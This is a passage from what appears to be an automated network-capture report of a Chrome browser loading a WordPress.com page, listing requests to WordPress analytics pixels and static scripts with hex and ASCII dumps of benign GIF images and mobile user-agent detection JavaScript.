                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:37 GMT
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Content-Length: 50
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                24192.168.2.1149773192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC749OUTGET /g.gif?blog=240074490&v=wpcom&tz=-8&user_id=0&post=22&subd=dnearymedahealthstaffing&host=dnearymedahealthstaffing.wordpress.com&ref=&rand=0.5972709169619024 HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:37 GMT
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Content-Length: 50
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                25192.168.2.1149776192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC528OUTGET /_static/??-eJx9jtEOgjAMRX/I0egk8mL8FDPmJB1ru7At/D4jAaM+8HhP7rktzFFZ4ew4g09A0mNwqiQ3maEyhfyWxqcTfPWoqBjKgJzAuxyNHbdcdWF4IlvoC4YXWDNJ3Qqf3g4aQj6YtUK0Xg84urT+9QOOxG1fzbEqf7F6D7qfb1p3rb5eOr8AfZ5eQA== HTTP/1.1
                                                                                                                                                                                                                                                Host: s0.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC485INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:37 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 61205
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 17:57:20 GMT
                                                                                                                                                                                                                                                Etag: "67588100-ef15"
                                                                                                                                                                                                                                                Expires: Wed, 10 Dec 2025 22:01:20 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw BYPASS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC884INData Raw: 28 20 66 75 6e 63 74 69 6f 6e 20 28 20 67 20 29 20 7b 0a 0a 20 20 76 61 72 20 74 20 3d 20 7b 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 57 49 4e 44 4f 57 53 3a 20 27 77 69 6e 64 6f 77 73 27 2c 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 49 50 48 4f 4e 45 3a 20 27 69 70 68 6f 6e 65 27 2c 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 49 50 4f 44 3a 20 27 69 70 6f 64 27 2c 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 49 50 41 44 3a 20 27 69 70 61 64 27 2c 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 42 4c 41 43 4b 42 45 52 52 59 3a 20 27 62 6c 61 63 6b 62 65 72 72 79 27 2c 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 42 4c 41 43 4b 42 45 52 52 59 5f 31 30 3a 20 27 62 6c 61 63 6b 62 65 72 72 79 5f 31 30 27 2c 0a 20 20 20 20 20 20 50 4c 41
                                                                                                                                                                                                                                                Data Ascii: ( function ( g ) { var t = { PLATFORM_WINDOWS: 'windows', PLATFORM_IPHONE: 'iphone', PLATFORM_IPOD: 'ipod', PLATFORM_IPAD: 'ipad', PLATFORM_BLACKBERRY: 'blackberry', PLATFORM_BLACKBERRY_10: 'blackberry_10', PLA
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 20 20 74 2e 67 65 74 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 67 65 74 4d 6f 62 69 6c 65 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 09 63 61 74 63 68 20 28 20 65 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 20 65 20 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 2c 0a 0a 20 20 20 20 20 20 69 6e 69 74 46 6f 72 54 65 73 74 3a 20 66 75 6e 63 74 69 6f 6e 28 20 75 73 65 72 41 67 65 6e 74 20 29 20 7b 0a 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 20 3d 20 66 61 6c 73 65
                                                                                                                                                                                                                                                Data Ascii: t.getPlatformName(); t.getMobileUserAgentName(); }catch ( e ) { console.error( e ); } }, initForTest: function( userAgent ) { t.matchedPlatformName = false; t.matchedUserAgentName = false
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 74 2e 69 73 42 6c 61 63 6b 62 65 72 72 79 31 30 28 29 20 29 0a 20 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 20 3d 20 27 62 6c 61 63 6b 62 65 72 72 79 5f 31 30 27 3b 0a 20 20 20 20 20 20 20 20 65 6c 73 65 20 69 66 20 28 20 68 61 73 28 20 27 62 6c 61 63 6b 62 65 72 72 79 27 20 29 20 29 0a 20 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 20 3d 20 27 62 6c 61 63 6b 62 65 72 72 79 27 3b 0a 20 20 20 20 20 20 20 20 65 6c 73 65 20 69 66 20 28 20 74 2e 69 73 42 6c 61 63 6b 62 65 72 72 79 54 61 62 6c 65 74 28 29 20 29 0a 20 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 20 3d 20 27 62 6c 61 63 6b 62 65 72 72 79 5f 74 61 62
                                                                                                                                                                                                                                                Data Ascii: t.isBlackberry10() ) t.matchedUserAgentName = 'blackberry_10'; else if ( has( 'blackberry' ) ) t.matchedUserAgentName = 'blackberry'; else if ( t.isBlackberryTablet() ) t.matchedUserAgentName = 'blackberry_tab
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 20 3d 20 27 69 70 61 64 2d 75 6e 6b 6e 6f 77 6e 27 3b 0a 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3b 0a 20 20 20 20 20 20 7d 2c 0a 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 54 68 69 73 20 6d 65 74 68 6f 64 20 64 65 74 65 63 74 73 20 74 68 65 20 6d 6f 62 69 6c 65 20 70 6c 61 74 66 6f 72 6d 20 6e 61 6d 65 2e 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 67 65 74 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 20 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 20 74 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 20 21 3d 3d 20 66 61 6c 73
                                                                                                                                                                                                                                                Data Ascii: t.matchedUserAgentName = 'ipad-unknown'; return t.matchedUserAgentName; }, /** * This method detects the mobile platform name. */ getPlatformName : function() { if ( t.matchedPlatformName !== fals
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 59 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 74 2e 69 73 53 79 6d 62 69 61 6e 50 6c 61 74 66 6f 72 6d 28 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 20 3d 20 74 2e 50 4c 41 54 46 4f 52 4d 5f 53 59 4d 42 49 41 4e 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 74 2e 69 73 53 79 6d 62 69 61 6e 53 34 30 50 6c 61 74 66 6f 72 6d 28 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 20 3d 20 74 2e 50 4c 41 54 46 4f 52 4d 5f 53 59 4d 42 49 41 4e 5f 53 34 30 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 74 2e 69 73 4a 32 4d 45 50 6c 61 74 66 6f 72 6d 28 29 20 29 20 7b 0a 20 20
                                                                                                                                                                                                                                                Data Ascii: Y; } else if ( t.isSymbianPlatform() ) { t.matchedPlatformName = t.PLATFORM_SYMBIAN; } else if ( t.isSymbianS40Platform() ) { t.matchedPlatformName = t.PLATFORM_SYMBIAN_S40; } else if ( t.isJ2MEPlatform() ) {
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 74 73 20 69 66 20 74 68 65 20 63 75 72 72 65 6e 74 20 55 41 20 69 73 20 69 50 68 6f 6e 65 20 4d 6f 62 69 6c 65 20 53 61 66 61 72 69 20 6f 72 20 61 6e 6f 74 68 65 72 20 69 50 68 6f 6e 65 20 6f 72 20 69 50 6f 64 20 54 6f 75 63 68 20 42 72 6f 77 73 65 72 2e 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 69 73 49 50 68 6f 6e 65 4f 72 49 50 6f 64 20 3a 20 63 68 65 63 6b 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 68 61 73 28 20 27 73 61 66 61 72 69 27 20 29 20 26 26 20 28 20 68 61 73 28 20 27 69 70 68 6f 6e 65 27 20 29 20 7c 7c 20 68 61 73 28 20 27 69 70 6f 64 27 20 29 20 29 3b 0a 20 20 20 20 20 20 7d 20 29 2c 0a 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 44 65 74 65 63 74 73 20 69 66 20 74 68
                                                                                                                                                                                                                                                Data Ascii: ts if the current UA is iPhone Mobile Safari or another iPhone or iPod Touch Browser. */ isIPhoneOrIPod : check( function() { return has( 'safari' ) && ( has( 'iphone' ) || has( 'ipod' ) ); } ), /** * Detects if th
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 77 73 65 72 20 69 73 20 4f 70 65 72 61 20 4d 69 6e 69 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 69 73 4f 70 65 72 61 4d 69 6e 69 20 3a 20 63 68 65 63 6b 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 68 61 73 28 20 27 6f 70 65 72 61 27 20 29 20 26 26 20 68 61 73 28 20 27 6d 69 6e 69 27 20 29 3b 0a 20 20 20 20 20 20 7d 20 29 2c 0a 0a 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 69 73 42 6c 61 63 6b 62 65 72 72 79 31 30 28 29 20 63 61 6e 20 62 65 20 75 73 65 64 20 74 6f 20 63 68 65 63 6b 20 74 68 65 20 55 73 65 72 20 41 67 65 6e 74 20 66 6f 72 20 61 20 42 6c 61 63 6b 42 65 72 72 79 20 31 30 20 64 65 76 69 63 65 2e 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 69 73 42 6c 61 63 6b 62 65
                                                                                                                                                                                                                                                Data Ascii: wser is Opera Mini */ isOperaMini : check( function() { return has( 'opera' ) && has( 'mini' ); } ), /** * isBlackberry10() can be used to check the User Agent for a BlackBerry 10 device. */ isBlackbe
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 65 72 27 20 29 20 7c 7c 20 68 61 73 28 20 27 6e 6f 6b 69 61 62 72 6f 77 73 65 72 27 20 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 20 29 2c 0a 0a 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 44 65 74 65 63 74 73 20 69 66 20 74 68 65 20 64 65 76 69 63 65 20 70 6c 61 74 66 6f 72 6d 20 69 73 20 74 68 65 20 53 79 6d 62 69 61 6e 20 53 65 72 69 65 73 20 36 30 2e 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 69 73 53 79 6d 62 69 61 6e 50 6c 61 74 66 6f 72 6d 20 3a 20 63 68 65 63 6b 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 20 68 61 73 28 20 27 77 65 62 6b 69 74 27 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 46 69 72 73 74 2c 20 74 65 73 74 20 66 6f 72 20 57 65 62 4b 69 74
                                                                                                                                                                                                                                                Data Ascii: er' ) || has( 'nokiabrowser' ); } } ), /** * Detects if the device platform is the Symbian Series 60. */ isSymbianPlatform : check( function() { if ( has( 'webkit' ) ) { // First, test for WebKit
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 20 20 20 20 69 73 46 61 63 65 62 6f 6f 6b 46 6f 72 49 70 61 64 20 3a 20 63 68 65 63 6b 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 20 21 20 68 61 73 28 20 27 69 70 61 64 27 20 29 20 29 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 68 61 73 28 20 27 66 61 63 65 62 6f 6f 6b 27 20 29 20 7c 7c 20 68 61 73 28 20 27 66 62 66 6f 72 69 70 68 6f 6e 65 27 20 29 20 7c 7c 20 68 61 73 28 20 27 66 62 61 6e 2f 66 62 69 6f 73 3b 27 20 29 3b 0a 20 20 20 20 20 20 7d 20 29 2c 0a 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 44 65 74 65 63 74 73 20 69 66 20 74 68 65 20 63 75 72 72 65 6e 74 20 55 41 20 69 73 20 46 61 63 65 62 6f 6f 6b 20 66 6f 72 20
                                                                                                                                                                                                                                                Data Ascii: isFacebookForIpad : check( function() { if ( ! has( 'ipad' ) ) return false; return has( 'facebook' ) || has( 'fbforiphone' ) || has( 'fban/fbios;' ); } ), /** * Detects if the current UA is Facebook for
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 6e 74 20 3d 3d 3d 20 66 61 6c 73 65 20 3f 20 66 61 6c 73 65 20 3a 20 66 6e 28 29 20 7c 7c 20 66 61 6c 73 65 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 67 2e 77 70 63 6f 6d 5f 6d 6f 62 69 6c 65 5f 75 73 65 72 5f 61 67 65 6e 74 5f 69 6e 66 6f 20 3d 20 74 3b 0a 0a 7d 20 29 28 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 77 69 6e 64 6f 77 20 3a 20 74 68 69 73 20 29 3b 0a 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 74 3d 7b 6e 6f 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 65 78 74 75 72 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 65 3d 28 65 3d 28 65 3d 28 65 2b 3d 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22
                                                                                                                                                                                                                                                Data Ascii: nt === false ? false : fn() || false; } } g.wpcom_mobile_user_agent_info = t;} )( typeof window !== 'undefined' ? window : this );;!function(){"use strict";var e,t={noop:function(){},texturize:function(e){return(e=(e=(e=(e+="").replace(/'/g,"


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                26192.168.2.1149784192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC964OUTGET /g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoL2xleFp%2BVXNmM3xVflA0X254PXM%2FJWhaPXRUUXFLanh%2BVUI2Zyt4fE56Y2xlV1EtXzhlTXEuQW5uNFYlWVZkbnpVckd1ZCwzJlNVQkNHWTRoRzJnZVJ6bC04ZlFJdnJLUnpUb2dBLTJKQmhHfEs2fCUvb112ZTZGcHw2S0FYLWljXURFcXxoTVdkT05jSzIvb3Z5OU1LOXxEUHpaK3J1&v=wpcom-no-pv&rand=0.2779972937038586 HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:38 GMT
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Content-Length: 50
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                27192.168.2.1149783192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC963OUTGET /t.gif?is_current_user_blog_owner=false&_en=wpcom_marketing_bar_impression&_ui=PfqOZc4jPU0a%2FtwKEstg1J5h&_ut=anon&_ts=1734709534238&_tz=5&_lg=en-US&_pf=Win32&_ht=1024&_wd=1280&_sx=0&_sy=0&_dl=https%3A%2F%2Fdnearymedahealthstaffing.wordpress.com%2Fmedahealthstaffing-proposal%2F&_dr=&blog_id=240074490&blog_tz=-8&user_lang=en&blog_lang=en&user_id=0&_rt=1734709534355&_=_ HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:38 GMT
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Content-Length: 43
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                28192.168.2.1149785192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC603OUTGET /wp-includes/js/wp-emoji-release.min.js?m=1719498190i&ver=6.8-alpha-59438 HTTP/1.1
                                                                                                                                                                                                                                                Host: s2.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:38 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:38 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 18726
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Thu, 27 Jun 2024 14:23:18 GMT
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                ETag: "667d75d6-4926"
                                                                                                                                                                                                                                                Expires: Fri, 21 Nov 2025 22:05:06 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
